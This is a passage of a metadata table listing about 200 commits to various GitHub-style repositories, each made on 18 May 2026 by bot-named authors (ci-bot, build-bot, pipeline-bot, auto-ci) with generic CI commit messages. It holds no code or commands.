| 1976 | dremzki/google-trends-scraper | 588c2cb53d9d | ci-bot | [email protected] | 2026-05-18T12:28:29.000Z | chore: update ci/cd pipeline |
| 1977 | binoybkp/nextjs-ai-chatbot | 589e4863e15d | auto-ci | [email protected] | 2026-05-18T14:03:56.000Z | chore: sync ci configuration |
| 1978 | CHESSComputing/UserMetaData | 589f1542402b | ci-bot | [email protected] | 2026-05-18T13:40:20.000Z | chore: optimize pipeline runtime |
| 1979 | alanmunoz25/snippets-tnu6wy | 58b49ef09937 | build-bot | [email protected] | 2026-05-18T14:23:12.000Z | chore: optimize pipeline runtime |
| 1980 | mashirolang/medisync | 58b4b6842c14 | pipeline-bot | [email protected] | 2026-05-18T12:19:15.000Z | chore: sync ci configuration |
| 1981 | NikAr0702/blog_website | 58bd73b17c0a | build-bot | [email protected] | 2026-05-18T12:12:28.000Z | chore: update ci/cd pipeline |
| 1982 | Akisan98/the-minimal-blog | 58c1960a0659 | pipeline-bot | [email protected] | 2026-05-18T14:04:29.000Z | chore: optimize pipeline runtime |
| 1983 | jsupa/pokus2 | 58c244cf565c | ci-bot | [email protected] | 2026-05-18T11:51:01.000Z | fix: correct build workflow |
| 1984 | jamier2007/test-action-1779100877058528591 | 58c7cc493652 | build-bot | [email protected] | 2026-05-18T13:30:13.000Z | ci: update build config |
| 1985 | lucky-hw-kim/NFT-Market-Place | 58cb0e23fae3 | build-bot | [email protected] | 2026-05-18T12:40:33.000Z | ci: add build optimization step |
| 1986 | HarshAgnihotri9/docker-project | 58cc3781a92c | pipeline-bot | [email protected] | 2026-05-18T12:09:30.000Z | ci: update build config |
| 1987 | alva-intelligence/.github | 58d01c925b91 | ci-bot | [email protected] | 2026-05-18T14:09:54.000Z | ci: update build config |
| 1988 | just-abdullah-dev/fabrics | 58e0ff731297 | ci-bot | [email protected] | 2026-05-18T13:55:28.000Z | build: improve ci performance |
| 1989 | nnfuad/hackspark-starter | 58e65bc65637 | pipeline-bot | [email protected] | 2026-05-18T13:21:24.000Z | chore: update ci/cd pipeline |
| 1990 | Sushanth18052005/SEAWS | 58ebbd4f6163 | pipeline-bot | [email protected] | 2026-05-18T12:03:12.000Z | chore: update ci/cd pipeline |
| 1991 | Hatem-Haj-Ismail/Jana | 58f8f883f4ff | auto-ci | [email protected] | 2026-05-18T12:11:24.000Z | chore: optimize pipeline runtime |
| 1992 | AmarKumarShaw/DSA-in-JS | 58f9ef18053c | pipeline-bot | [email protected] | 2026-05-18T12:08:33.000Z | ci: add build optimization step |
| 1993 | ChanceDevelopment/sishi | 58fcb25788d3 | ci-bot | [email protected] | 2026-05-18T12:43:24.000Z | ci: add build optimization step |
| 1994 | baburatheesh/My-Portfolio-android-app | 590341343303 | pipeline-bot | [email protected] | 2026-05-18T13:52:19.000Z | ci: update build config |
| 1995 | krowslyare/morapack-frontend | 591fc1cacffd | build-bot | [email protected] | 2026-05-18T12:36:32.000Z | chore: optimize pipeline runtime |
| 1996 | edrichard/Java-XML | 5934b1c71541 | ci-bot | [email protected] | 2026-05-18T16:23:48.000Z | build: improve ci performance |
| 1997 | MalikAhmad-17/event-management-backend | 59406306cbf8 | pipeline-bot | [email protected] | 2026-05-18T14:05:40.000Z | chore: sync ci configuration |
| 1998 | EllieAnth/CathyCreationbyCindy | 5943aac0d554 | auto-ci | [email protected] | 2026-05-18T14:04:44.000Z | chore: sync ci configuration |
| 1999 | mukesh682/friday-v1 | 59610cf27663 | build-bot | [email protected] | 2026-05-18T12:15:48.000Z | ci: add build optimization step |
| 2000 | Asultop/AsulTopd | 5965faf27742 | ci-bot | [email protected] | 2026-05-18T12:41:40.000Z | chore: update ci/cd pipeline |
| 2001 | greatchaochao/data_analytics | 5976b93fd852 | auto-ci | [email protected] | 2026-05-18T12:11:54.000Z | ci: add build optimization step |
| 2002 | deploy11/deeplab-b | 5980e6c9289c | ci-bot | [email protected] | 2026-05-18T11:49:32.000Z | fix: correct build workflow |
| 2003 | arpanpokharel07/Merlin | 59822d13b149 | ci-bot | [email protected] | 2026-05-18T16:25:37.000Z | chore: optimize pipeline runtime |
| 2004 | fere-oss/fere | 5982aab411d9 | pipeline-bot | [email protected] | 2026-05-18T12:55:14.000Z | build: improve ci performance |
| 2005 | huyixi/prisoner-fitness | 5987070c1044 | pipeline-bot | [email protected] | 2026-05-18T13:46:36.000Z | chore: optimize pipeline runtime |
| 2006 | gitfarag/nestGlobals | 59a10ceae095 | build-bot | [email protected] | 2026-05-18T17:21:30.000Z | fix: correct build workflow |
| 2007 | unwana573/React-API-integration | 59ab62800625 | pipeline-bot | [email protected] | 2026-05-18T13:42:25.000Z | ci: add build optimization step |
| 2008 | deploy11/d | 59af734d7dd9 | auto-ci | [email protected] | 2026-05-18T11:54:54.000Z | fix: correct build workflow |
| 2009 | ho-cyber/Website | 59b89f551de3 | ci-bot | [email protected] | 2026-05-18T17:29:30.000Z | chore: update ci/cd pipeline |
| 2010 | kayosama007/build-pipeline-387 | 59c4da397ada | ci-bot | [email protected] | 2026-05-18T14:22:40.000Z | fix: correct build workflow |
| 2011 | EnamulBokshi/nextLevel-programming-hero | 59c73635868f | pipeline-bot | [email protected] | 2026-05-18T15:30:29.000Z | fix: correct build workflow |
| 2012 | junu47/House_Price_Prediction_Systems | 59c9e772bde9 | ci-bot | [email protected] | 2026-05-18T12:08:31.000Z | chore: sync ci configuration |
| 2013 | chicoluan/mtech-pokeapi | 59d20b25c70f | pipeline-bot | [email protected] | 2026-05-18T12:44:18.000Z | ci: add build optimization step |
| 2014 | varunvaghasiya11/Day-11-challange | 59d40ee45788 | auto-ci | [email protected] | 2026-05-18T13:53:57.000Z | chore: optimize pipeline runtime |
| 2015 | trixobird/practice | 59ea15e9de71 | ci-bot | [email protected] | 2026-05-18T14:39:58.000Z | ci: update build config |
| 2016 | huyparody/huyparody | 59eff44fed44 | pipeline-bot | [email protected] | 2026-05-18T14:14:40.000Z | chore: sync ci configuration |
| 2017 | trixobird/typescript_playground | 5a03117d6cd8 | pipeline-bot | [email protected] | 2026-05-18T14:43:46.000Z | chore: sync ci configuration |
| 2018 | aledipa/GraphicThreadTacToe | 5a040b903458 | ci-bot | [email protected] | 2026-05-18T12:37:56.000Z | chore: optimize pipeline runtime |
| 2019 | osamahkenawy/perfume-museum | 5a0cf3649981 | build-bot | [email protected] | 2026-05-18T15:18:43.000Z | build: improve ci performance |
| 2020 | deploy11/hammasibittada | 5a12539c58aa | auto-ci | [email protected] | 2026-05-18T11:54:13.000Z | chore: update ci/cd pipeline |
| 2021 | onenarok777/onenarok777 | 5a170368bf51 | pipeline-bot | [email protected] | 2026-05-18T12:48:07.000Z | build: improve ci performance |
| 2022 | Udbhav-2k25/udbhav-vibe-coders | 5a1bebc58bf0 | build-bot | [email protected] | 2026-05-18T13:08:36.000Z | chore: optimize pipeline runtime |
| 2023 | ahmedux03/PFF_Final_Project | 5a1c6139ebd1 | build-bot | [email protected] | 2026-05-18T12:17:08.000Z | chore: update ci/cd pipeline |
| 2024 | alxklx/music-library | 5a208a71cce4 | auto-ci | [email protected] | 2026-05-18T12:21:28.000Z | chore: update ci/cd pipeline |
| 2025 | Raysharr/custom-scrollbar | 5a354d795db4 | pipeline-bot | [email protected] | 2026-05-18T12:35:09.000Z | chore: update ci/cd pipeline |
| 2026 | danhoernchen/odin-binary-tree | 5a380d63ef30 | build-bot | [email protected] | 2026-05-18T13:53:56.000Z | ci: add build optimization step |
| 2027 | HamzaElMkhantar/prop-app | 5a40cfd016ae | build-bot | [email protected] | 2026-05-18T17:19:41.000Z | ci: update build config |
| 2028 | kayosama007/ci-build-20260329-185906-7266 | 5a4fae9e5945 | ci-bot | [email protected] | 2026-05-18T14:25:23.000Z | build: improve ci performance |
| 2029 | BienG3Rd/DEMOHUB | 5a50c2b141f1 | pipeline-bot | [email protected] | 2026-05-18T16:20:34.000Z | chore: sync ci configuration |
| 2030 | Team-ADAPT/NovaPass | 5a55af33d988 | auto-ci | [email protected] | 2026-05-18T16:25:57.000Z | build: improve ci performance |
| 2031 | AkshatYadav-bit/sih- | 5a5b32d7c770 | ci-bot | [email protected] | 2026-05-18T12:07:31.000Z | chore: optimize pipeline runtime |
| 2032 | arhen/arhen | 5a7d38b8ddb3 | ci-bot | [email protected] | 2026-05-18T14:09:58.000Z | chore: optimize pipeline runtime |
| 2033 | arj1211/surveillance-camera | 5a7fdc0abc46 | pipeline-bot | [email protected] | 2026-05-18T15:50:35.000Z | chore: sync ci configuration |
| 2034 | vahitkeskin/Tessera | 5a8008878d68 | ci-bot | [email protected] | 2026-05-18T13:22:40.000Z | ci: update build config |
| 2035 | Black-Iron-Project/build | 5a979de4084b | auto-ci | [email protected] | 2026-05-18T17:29:48.000Z | chore: optimize pipeline runtime |
| 2036 | Ashwiin/Exploratory-Data-Analysis-for-Data-Visualization | 5aa1f6baf88b | build-bot | [email protected] | 2026-05-18T16:52:36.000Z | build: improve ci performance |
| 2037 | Joouta18/teste-nextjs | 5ab4e7134e07 | pipeline-bot | [email protected] | 2026-05-18T14:24:01.000Z | build: improve ci performance |
| 2038 | CreativeMasterBonin/xtragamesrepo | 5ab5fd3cca4e | build-bot | [email protected] | 2026-05-18T14:04:26.000Z | ci: add build optimization step |
| 2039 | revel-um/test-action-1778957958882937636 | 5abc811bb08f | pipeline-bot | [email protected] | 2026-05-18T12:05:14.000Z | ci: update build config |
| 2040 | melsaghier/test-action-1779119164941440288 | 5ac5be746478 | build-bot | [email protected] | 2026-05-18T15:45:38.000Z | chore: update ci/cd pipeline |
| 2041 | baburatheesh/Tut | 5ad655842abe | auto-ci | [email protected] | 2026-05-18T13:53:32.000Z | chore: update ci/cd pipeline |
| 2042 | onenarok777/basic-express-api | 5ad76be4abde | build-bot | [email protected] | 2026-05-18T12:47:06.000Z | chore: update ci/cd pipeline |
| 2043 | PeterTokmakov/actions-check-tmp | 5ad7d399d753 | build-bot | [email protected] | 2026-05-18T11:51:22.000Z | ci: update build config |
| 2044 | manavkumar-cpu/jigyasa_lastdance | 5ae9c245618b | build-bot | [email protected] | 2026-05-18T13:02:44.000Z | build: improve ci performance |
| 2045 | An63llvs/test-action-1778964631265963365 | 5af4397532ba | pipeline-bot | [email protected] | 2026-05-18T12:13:11.000Z | build: improve ci performance |
| 2046 | umairabhatti786/test-action-1778960008573050468 | 5af9ca7b4d14 | build-bot | [email protected] | 2026-05-18T12:30:42.000Z | ci: add build optimization step |
| 2047 | 10014Rebellion/Arya_ShanmukhBottomFeederCode2025 | 5b021dcdaf99 | ci-bot | [email protected] | 2026-05-18T13:50:22.000Z | build: improve ci performance |
| 2048 | UJ911/Volitility-Analysis-of-index-funds-for-pre-during-and-post-COVID-using-GARCH-models | 5b05fe05dabe | auto-ci | [email protected] | 2026-05-18T13:42:59.000Z | chore: optimize pipeline runtime |
| 2049 | andersonphiri/rabbitmq-go-rpc | 5b07de0bd568 | ci-bot | [email protected] | 2026-05-18T13:56:24.000Z | build: improve ci performance |
| 2050 | saradune6/LeetCode | 5b0ae35ffbb0 | pipeline-bot | [email protected] | 2026-05-18T12:59:39.000Z | ci: add build optimization step |
| 2051 | arj1211/ted-ed-riddles | 5b13a3fc5147 | auto-ci | [email protected] | 2026-05-18T15:50:41.000Z | build: improve ci performance |
| 2052 | fxavier72/learnphp | 5b179f38fd11 | auto-ci | [email protected] | 2026-05-18T16:23:25.000Z | chore: sync ci configuration |
| 2053 | abhinavhello/test-action-1778960008409217272 | 5b1b1e297a59 | pipeline-bot | [email protected] | 2026-05-18T12:04:14.000Z | chore: optimize pipeline runtime |
| 2054 | thebenmerlin/meera | 5b2283812e86 | build-bot | [email protected] | 2026-05-18T12:18:06.000Z | chore: optimize pipeline runtime |
| 2055 | ankitkumar572005/plant-health-vision | 5b26c6e12884 | pipeline-bot | [email protected] | 2026-05-18T16:53:42.000Z | ci: update build config |
| 2056 | siddsp02/LawReach | 5b3a7fe8b540 | ci-bot | [email protected] | 2026-05-18T13:49:00.000Z | ci: add build optimization step |
| 2057 | RameshRukshan/Spring-App-with-REST---Demo | 5b3af9bad425 | pipeline-bot | [email protected] | 2026-05-18T17:38:31.000Z | chore: sync ci configuration |
| 2058 | Debbatisudheer/Ecs-task-checker | 5b3c4ed97181 | build-bot | [email protected] | 2026-05-18T17:06:54.000Z | chore: optimize pipeline runtime |
| 2059 | alanmunoz25/snippets-r1w4g3 | 5b4697305db4 | build-bot | [email protected] | 2026-05-18T14:23:17.000Z | chore: optimize pipeline runtime |
| 2060 | DipeshSinghNegi/VaultPass | 5b48f1a37c89 | auto-ci | [email protected] | 2026-05-18T12:10:20.000Z | ci: update build config |
| 2061 | kozlowski98/test-action-1778997996749695900 | 5b4adce8a301 | pipeline-bot | [email protected] | 2026-05-18T13:38:58.000Z | chore: update ci/cd pipeline |
| 2062 | roydellclarke/goto | 5b4c10750814 | auto-ci | [email protected] | 2026-05-18T13:03:09.000Z | fix: correct build workflow |
| 2063 | rubizcode-it/rubizcode-it | 5b66800cd037 | pipeline-bot | [email protected] | 2026-05-18T13:38:00.000Z | chore: update ci/cd pipeline |
| 2064 | jongsun-park/ml_python_cookbook | 5b8c6faf3703 | pipeline-bot | [email protected] | 2026-05-18T16:17:37.000Z | ci: add build optimization step |
| 2065 | Wanghley/stepdrop-tiny-diffusion | 5bacef56ac6c | pipeline-bot | [email protected] | 2026-05-18T14:22:07.000Z | ci: update build config |
| 2066 | NikolasAcquaviva/OSProject2122 | 5baf06bc0cb1 | build-bot | [email protected] | 2026-05-18T17:07:28.000Z | chore: update ci/cd pipeline |
| 2067 | shivanshu-pietechsolutions/Ap-Construction | 5bb68d8b4031 | build-bot | [email protected] | 2026-05-18T12:47:07.000Z | ci: update build config |
| 2068 | Michkath12/Challenge | 5bb6fd1f8f88 | ci-bot | [email protected] | 2026-05-18T17:09:13.000Z | ci: update build config |
| 2069 | crevosys-official/crevosys_2.0 | 5bbf3e899899 | build-bot | [email protected] | 2026-05-18T16:02:18.000Z | chore: sync ci configuration |
| 2070 | BharatDasa/devops-muti-env | 5bcd8d6f1c78 | ci-bot | [email protected] | 2026-05-18T13:49:44.000Z | build: improve ci performance |
| 2071 | Harshit2510745/Full-Stack-Integration-1 | 5bd7ec939d4c | auto-ci | [email protected] | 2026-05-18T13:00:30.000Z | ci: add build optimization step |
| 2072 | JANERUBBISHTOEAT/wx_app | 5bdfc52f153b | ci-bot | [email protected] | 2026-05-18T13:03:26.000Z | ci: add build optimization step |
| 2073 | Yousif-12/test-action-1778963955792495986 | 5be634231be6 | pipeline-bot | [email protected] | 2026-05-18T13:28:02.000Z | build: improve ci performance |
| 2074 | EnamulBokshi/hardwork_project | 5bf08b762172 | pipeline-bot | [email protected] | 2026-05-18T15:34:43.000Z | chore: sync ci configuration |
| 2075 | Sbongslany/specno_currency | 5bfd2cbe4716 | build-bot | [email protected] | 2026-05-18T16:29:11.000Z | ci: add build optimization step |
| 2076 | ankitnagar34/Number-Guessing-Game | 5c3c1bc5aa37 | pipeline-bot | [email protected] | 2026-05-18T16:15:34.000Z | chore: optimize pipeline runtime |
| 2077 | tumkama/test-action-1779119165095724142 | 5c5086f1c210 | pipeline-bot | [email protected] | 2026-05-18T13:17:31.000Z | fix: correct build workflow |
| 2078 | bishaldahal4777/chaiheadq | 5c5a15de686a | pipeline-bot | [email protected] | 2026-05-18T13:31:41.000Z | chore: optimize pipeline runtime |
| 2079 | sj123r/ML_Practice | 5c5ae523e5c6 | pipeline-bot | [email protected] | 2026-05-18T13:44:28.000Z | fix: correct build workflow |
| 2080 | RobertLlb/Aplicacao_Web_FullStack | 5c69290d5235 | build-bot | [email protected] | 2026-05-18T14:33:28.000Z | chore: update ci/cd pipeline |
| 2081 | Denis10/CollapsingAndNavigation | 5c6c30bec662 | pipeline-bot | [email protected] | 2026-05-18T13:56:40.000Z | ci: update build config |
| 2082 | rahulj004/LP3 | 5c6d5ab230a3 | ci-bot | [email protected] | 2026-05-18T15:58:09.000Z | chore: sync ci configuration |
| 2083 | UEMBCAProjectgroup18/YouTube-subtitles | 5c7c1a275ed8 | build-bot | [email protected] | 2026-05-18T15:49:25.000Z | chore: optimize pipeline runtime |
| 2084 | Harshit2510745/fs-project | 5c841cec125f | build-bot | [email protected] | 2026-05-18T12:59:49.000Z | ci: add build optimization step |
| 2085 | iamroshanpatak/DevOps | 5c88e9d3df4e | ci-bot | [email protected] | 2026-05-18T16:30:16.000Z | ci: update build config |
| 2086 | the-wilful-youth/FriendBook | 5c92ab9583c2 | build-bot | [email protected] | 2026-05-18T16:28:57.000Z | ci: update build config |
| 2087 | ygyuri/MVPEVENT_i | 5c9d5814f5d4 | ci-bot | [email protected] | 2026-05-18T12:56:55.000Z | chore: sync ci configuration |
| 2088 | rickastley87/vision-assist-ai | 5c9e56e2c776 | auto-ci | [email protected] | 2026-05-18T12:07:47.000Z | chore: update ci/cd pipeline |
| 2089 | vrct07/vrct07 | 5ca30c07369e | pipeline-bot | [email protected] | 2026-05-18T14:21:15.000Z | chore: sync ci configuration |
| 2090 | deploy11/TodoAppVue | 5ca4223bbab3 | pipeline-bot | [email protected] | 2026-05-18T11:51:01.000Z | build: improve ci performance |
| 2091 | umairabhatti786/FitClothes | 5ca5dc80b270 | build-bot | [email protected] | 2026-05-18T13:04:09.000Z | chore: optimize pipeline runtime |
| 2092 | Xenonidium/test-action-1779116637101451224 | 5cb0956d89c8 | build-bot | [email protected] | 2026-05-18T12:41:41.000Z | fix: correct build workflow |
| 2093 | thebenmerlin/MVP90 | 5cb69bab0393 | ci-bot | [email protected] | 2026-05-18T12:09:38.000Z | fix: correct build workflow |
| 2094 | EnamulBokshi/Java-interface | 5cc1159a6c3d | pipeline-bot | [email protected] | 2026-05-18T15:36:28.000Z | build: improve ci performance |
| 2095 | yashlad27/test-action-1778997996744912177 | 5cc74fa0a00b | ci-bot | [email protected] | 2026-05-18T13:14:37.000Z | ci: update build config |
| 2096 | Skypieee6/helix-ai | 5cc7be53cf97 | build-bot | [email protected] | 2026-05-18T14:33:45.000Z | ci: update build config |
| 2097 | henryalouf/orion-chat | 5ccc5134c073 | pipeline-bot | [email protected] | 2026-05-18T15:10:41.000Z | fix: correct build workflow |
| 2098 | Fablelie/ticket-booking-backend | 5cd5427f059e | ci-bot | [email protected] | 2026-05-18T17:07:05.000Z | chore: update ci/cd pipeline |
| 2099 | DexxoDev/RayanPersonnalWebsite | 5ce6c7a47360 | ci-bot | [email protected] | 2026-05-18T13:43:50.000Z | chore: update ci/cd pipeline |
| 2100 | ammadey7/my-os_worksheet-1 | 5ce7aa32adb8 | auto-ci | [email protected] | 2026-05-18T13:13:47.000Z | fix: correct build workflow |
| 2101 | David-Irihose/MysuperRepo | 5ce7e7947092 | pipeline-bot | [email protected] | 2026-05-18T13:28:47.000Z | ci: update build config |
| 2102 | ankitkumar572005/test-action-1779110817011024361 | 5cef7262a899 | ci-bot | [email protected] | 2026-05-18T16:37:40.000Z | ci: add build optimization step |
| 2103 | kayosama007/ci-build-20260329-185735-6268 | 5cfaae25a8f0 | pipeline-bot | [email protected] | 2026-05-18T14:25:48.000Z | ci: add build optimization step |
| 2104 | BryanAlexanderSantoso/CRM-Pro | 5d0476a9d348 | build-bot | [email protected] | 2026-05-18T13:47:43.000Z | ci: add build optimization step |
| 2105 | micymike/My-first-Game | 5d078e0e8cab | pipeline-bot | [email protected] | 2026-05-18T16:22:34.000Z | ci: update build config |
| 2106 | yashlad27/PDPLab8 | 5d1b178168b7 | auto-ci | [email protected] | 2026-05-18T13:28:36.000Z | chore: sync ci configuration |
| 2107 | varunvaghasiya11/Node_js_server | 5d359194efe1 | pipeline-bot | [email protected] | 2026-05-18T13:59:11.000Z | build: improve ci performance |
| 2108 | Udbhav-2025/udbhav-ht100-cv-007 | 5d4849ef7be4 | ci-bot | [email protected] | 2026-05-18T13:08:01.000Z | ci: update build config |
| 2109 | yashlad27/PDPLab10 | 5d4b36f897c6 | pipeline-bot | [email protected] | 2026-05-18T13:28:05.000Z | ci: add build optimization step |
| 2110 | lakers07/Big-Mart-Sales-Analysis-Linear-Regression | 5d4dfe9857b6 | ci-bot | [email protected] | 2026-05-18T13:39:43.000Z | ci: add build optimization step |
| 2111 | aalmonzer/aalmonzer | 5d514d7f2d82 | pipeline-bot | [email protected] | 2026-05-18T12:59:22.000Z | fix: correct build workflow |
| 2112 | EnigmaOrg101/api | 5d6293157608 | build-bot | [email protected] | 2026-05-18T12:06:39.000Z | chore: update ci/cd pipeline |
| 2113 | 88daxiong/daily-os | 5d761915d6d7 | auto-ci | [email protected] | 2026-05-18T16:39:22.000Z | ci: update build config |
| 2114 | phase23/navaxaiios | 5d83dda35a33 | ci-bot | [email protected] | 2026-05-18T11:44:42.000Z | fix: correct build workflow |
| 2115 | bishaldahal4777/imageuploader | 5d874ac50af3 | ci-bot | [email protected] | 2026-05-18T13:31:04.000Z | chore: optimize pipeline runtime |
| 2116 | zaunere/popndrop | 5d93cb6f3ad7 | ci-bot | [email protected] | 2026-05-18T13:32:12.000Z | ci: add build optimization step |
| 2117 | just-abdullah-dev/scad_lab8 | 5db3a76f2e1a | auto-ci | [email protected] | 2026-05-18T13:54:53.000Z | fix: correct build workflow |
| 2118 | saygit/crm-app | 5db54f049512 | pipeline-bot | [email protected] | 2026-05-18T12:38:24.000Z | ci: add build optimization step |
| 2119 | vkuznet/claude-code-chart | 5dc6ea83bbdf | auto-ci | [email protected] | 2026-05-18T13:36:55.000Z | build: improve ci performance |
| 2120 | eze021188/perfumes-elisa-admin-app | 5df26a74f887 | ci-bot | [email protected] | 2026-05-18T17:07:41.000Z | ci: update build config |
| 2121 | Grzzmine/test-action-1779116428074467933 | 5e01599e72df | auto-ci | [email protected] | 2026-05-18T12:00:29.000Z | ci: add build optimization step |
| 2122 | LuanKrzyzaniak/lambda-calc-interpreter | 5e08019834bf | build-bot | [email protected] | 2026-05-18T17:06:11.000Z | fix: correct build workflow |
| 2123 | Bekir-Caglar/Yazar-Eser | 5e0d7a9c9b8b | ci-bot | [email protected] | 2026-05-18T13:15:26.000Z | chore: update ci/cd pipeline |
| 2124 | AyushAnand-28/ChurnSight | 5e2602436eaa | build-bot | [email protected] | 2026-05-18T16:42:20.000Z | chore: sync ci configuration |
| 2125 | smit-sk/Fruits | 5e318c1afdee | ci-bot | [email protected] | 2026-05-18T16:13:38.000Z | fix: correct build workflow |
| 2126 | Urban-Guide/UrbanGuide-App | 5e3c2db38c6a | build-bot | [email protected] | 2026-05-18T14:06:00.000Z | fix: correct build workflow |
| 2127 | Ig0tU/ocodx | 5e4224dab1ae | pipeline-bot | [email protected] | 2026-05-18T14:23:24.000Z | chore: sync ci configuration |
| 2128 | revel-um/webrtc | 5e56b1c10bb4 | pipeline-bot | [email protected] | 2026-05-18T12:10:34.000Z | ci: update build config |
| 2129 | Analoq-IO/atlas-feedback | 5e70daa8b354 | auto-ci | [email protected] | 2026-05-18T17:34:21.000Z | ci: update build config |
| 2130 | c0der0jal/ds-assignment | 5e9564b8f18e | ci-bot | [email protected] | 2026-05-18T12:54:53.000Z | fix: correct build workflow |
| 2131 | kayosama007/ci-build-20260329-190511-2138 | 5ed6013c6447 | auto-ci | [email protected] | 2026-05-18T14:23:33.000Z | fix: correct build workflow |
| 2132 | Blessing-Chitiyo/test-action-1779106619292912979 | 5ee2693b62fa | pipeline-bot | [email protected] | 2026-05-18T16:50:21.000Z | chore: update ci/cd pipeline |
| 2133 | Srj-Love/CustomViews | 5ee409391041 | build-bot | [email protected] | 2026-05-18T12:55:15.000Z | ci: add build optimization step |
| 2134 | kayosama007/ci-build-20260329-190602-7779 | 5f08ab2263e0 | auto-ci | [email protected] | 2026-05-18T14:23:12.000Z | ci: add build optimization step |
| 2135 | amitos80/base-ui-semantic-table | 5f1aec1b2f72 | build-bot | [email protected] | 2026-05-18T13:52:45.000Z | chore: sync ci configuration |
| 2136 | zzamiell/frontend-super-garut | 5f1f2d73fb8b | ci-bot | [email protected] | 2026-05-18T13:14:43.000Z | ci: add build optimization step |
| 2137 | anshvarma07/oibsip_taskno2 | 5f33cd36cd92 | auto-ci | [email protected] | 2026-05-18T13:40:40.000Z | build: improve ci performance |
| 2138 | tranbaolong19/nganhangtools | 5f38614f19e0 | auto-ci | [email protected] | 2026-05-18T13:45:13.000Z | chore: sync ci configuration |
| 2139 | Davidf2004/test-action-1778964630672571090 | 5f47f7acccb7 | ci-bot | [email protected] | 2026-05-18T16:59:41.000Z | ci: update build config |
| 2140 | jamier2007/ultimate-combined-scrape | 5f536cd71444 | build-bot | [email protected] | 2026-05-18T13:46:53.000Z | fix: correct build workflow |
| 2141 | Googolplex238371/traditio | 5f563b0d723f | pipeline-bot | [email protected] | 2026-05-18T12:42:23.000Z | chore: update ci/cd pipeline |
| 2142 | JackRArne/Falcon-RAD | 5f728391f35e | build-bot | [email protected] | 2026-05-18T16:09:57.000Z | chore: update ci/cd pipeline |
| 2143 | azimsidd/MVVM-DAGGER-HILT-USERLISTING | 5f8c7d4d8ad4 | ci-bot | [email protected] | 2026-05-18T13:22:27.000Z | build: improve ci performance |
| 2144 | prhudsonsoarez-svg/kadosh_design_old | 5f9743420369 | auto-ci | [email protected] | 2026-05-18T12:05:49.000Z | ci: update build config |
| 2145 | phase23/axcessfoods | 5fa1ed20aa70 | ci-bot | [email protected] | 2026-05-18T11:46:35.000Z | ci: add build optimization step |
| 2146 | Sbongslany/tvshow_app | 5fa3a07ad973 | build-bot | [email protected] | 2026-05-18T16:29:18.000Z | build: improve ci performance |
| 2147 | huyixi/CapMind-Cli | 5fa42cb7b57c | auto-ci | [email protected] | 2026-05-18T13:43:44.000Z | fix: correct build workflow |
| 2148 | Matikg/SmartHome-App | 5fd1a4574cfd | pipeline-bot | [email protected] | 2026-05-18T13:42:15.000Z | ci: add build optimization step |
| 2149 | ele-spano22/master-thesis | 5ff0d545da5b | auto-ci | [email protected] | 2026-05-18T14:08:22.000Z | chore: sync ci configuration |
| 2150 | VikingProduction/codeur-automatisation | 5ff2b38bcbc6 | pipeline-bot | [email protected] | 2026-05-18T14:41:27.000Z | ci: update build config |
| 2151 | Shillerx/FeedBackOpgaveTCPServerClientOverforesler | 5ff713ee3b4d | build-bot | [email protected] | 2026-05-18T12:32:53.000Z | build: improve ci performance |
| 2152 | David-Irihose/Student-Finance-Tracker | 5ffa6e4060e8 | build-bot | [email protected] | 2026-05-18T13:27:10.000Z | chore: sync ci configuration |
| 2153 | R-Dinesh-Kumar2004/insurance-project | 5ffddf78699c | build-bot | [email protected] | 2026-05-18T14:07:29.000Z | ci: add build optimization step |
| 2154 | Tiledesk/.github | 60040fd2fccf | auto-ci | [email protected] | 2026-05-18T13:06:48.000Z | build: improve ci performance |
| 2155 | mukesh682/engineraa | 6005a004089e | build-bot | [email protected] | 2026-05-18T12:16:41.000Z | ci: add build optimization step |
| 2156 | ArjunJr05/Examination_portal | 600d7dc8fe57 | pipeline-bot | [email protected] | 2026-05-18T13:02:47.000Z | chore: sync ci configuration |
| 2157 | shivanshu-pietechsolutions/test-action-1779100876989652588 | 6010bff38a3d | ci-bot | [email protected] | 2026-05-18T12:46:27.000Z | build: improve ci performance |
| 2158 | RobertLlb/Portifolio | 601ae1377054 | ci-bot | [email protected] | 2026-05-18T14:33:45.000Z | chore: update ci/cd pipeline |
| 2159 | just-abdullah-dev/Simple-Calculator | 60342aa38d2d | auto-ci | [email protected] | 2026-05-18T13:58:58.000Z | chore: update ci/cd pipeline |
| 2160 | Davidf2004/macos-app | 60491cd0f95d | pipeline-bot | [email protected] | 2026-05-18T17:11:06.000Z | ci: add build optimization step |
| 2161 | vansh7266/uora-platform | 605544efa051 | build-bot | [email protected] | 2026-05-18T16:44:56.000Z | fix: correct build workflow |
| 2162 | edrichard/24hducode | 605648217ef5 | pipeline-bot | [email protected] | 2026-05-18T16:20:52.000Z | build: improve ci performance |
| 2163 | SamuelHLewis/python-intermediate-inflammation | 606848ded503 | auto-ci | [email protected] | 2026-05-18T15:40:40.000Z | ci: add build optimization step |
| 2164 | l8yh1/RAJESH | 60690a86a5db | auto-ci | [email protected] | 2026-05-18T17:21:16.000Z | ci: add build optimization step |
| 2165 | DekafTheFirst/employee-management-system | 606b62678e44 | build-bot | [email protected] | 2026-05-18T12:43:36.000Z | ci: update build config |
| 2166 | rahulbohra57/Celcius-to-Fahreheit-Converter | 6081b08bf3d6 | ci-bot | [email protected] | 2026-05-18T16:43:56.000Z | ci: update build config |
| 2167 | NITHIN-NT/nithinraj | 6091400af467 | pipeline-bot | [email protected] | 2026-05-18T13:20:35.000Z | build: improve ci performance |
| 2168 | pareesa969/Mini-Skill-Learning-App | 60928ad77a93 | pipeline-bot | [email protected] | 2026-05-18T13:45:10.000Z | chore: optimize pipeline runtime |
| 2169 | charanamith/PROJECT | 60a11b570937 | auto-ci | [email protected] | 2026-05-18T16:58:22.000Z | chore: update ci/cd pipeline |
| 2170 | Srj-Love/flutter_app | 60a87bb406b2 | pipeline-bot | [email protected] | 2026-05-18T12:51:53.000Z | ci: add build optimization step |
| 2171 | naytanvieira/Criar-Index-Firebase | 60aade299126 | pipeline-bot | [email protected] | 2026-05-18T15:13:56.000Z | ci: add build optimization step |
| 2172 | XinyiC23/test-action-1779100116395655127 | 60ae60347e7d | auto-ci | [email protected] | 2026-05-18T16:36:14.000Z | fix: correct build workflow |
| 2173 | umairabhatti786/CircleSocialApp | 60af4e8456b1 | pipeline-bot | [email protected] | 2026-05-18T12:59:27.000Z | build: improve ci performance |
| 2174 | deploy11/uzimizniki | 60b5ce118687 | auto-ci | [email protected] | 2026-05-18T11:52:23.000Z | chore: sync ci configuration |
